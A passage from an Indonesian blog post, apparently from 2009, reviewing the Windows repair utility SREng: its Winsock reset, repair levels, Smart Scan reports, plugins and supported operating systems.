Tetapi ketika koneksi jaringan berjalan baik dan kita bisa browsing, mengirim email atau mengerjakan operasi jaringan lainnya, tidak disarankan untuk di Reset. Selengkapnya tentang Winsock

Advanced Repair

Terdapat dua pengaturan di menu ini, yaitu Recommended Fix Level dan Powerful Fix Level. Ada juga tombol untuk me-Reset Winsock, memperbaki Safe Mode dan Melakukan Scan API Hook ( tingkat lanjut).

Smart Scan

Smart scan akan melakukan scan komputer menghasilkan laporan secara detail tentang sistem komputer yang selanjutnya bisa digunakan oleh orang yang lebih ahli untuk memeriksa dan mengatasi permasalahan komputer.

Extensions

SREng mendukung tambahan fitur yang bisa ditambahkan secara terpisah (bisa juga membuat tambahan/plugins sendiri). Di Halaman Download SREng disertakan beberapa plugins seperti :

• NTFS Stream Scanner, untuk memeriksa format NTFS dari adanya data berbahaya
• Windows Shell Menu Manager, untuk mengatur windows shell menu seperti menu ketika klik kanan desktop dan lainnya.
• File Figital Sign Verify, mengetahui dan verifikasi digital signature sebuah file.
• Network Activity Monitor, memonitor aktivitas/status jaringan dan memberikan informasi detail tentang koneksi tersebut.

Satu hal yang mungkin agak kurang adalah belum adanya file bantuan (manual) yang berbahasa Inggris, adanya dalam bahasa China dan itupun masih membahas versi 2.5. Terlepas dari hal itu, program ini sangat bermanfaat dan bisa berjalan di sistem operasi : Windows 98SE, ME, 2000, XP 32bit, Server 2003 32bit, Vista 32bit, Server 2008 32bit.

http://ebsoft.web.id/2009/05/26/memperbaiki-kerusakan-sistem-komputer-akibat-virus/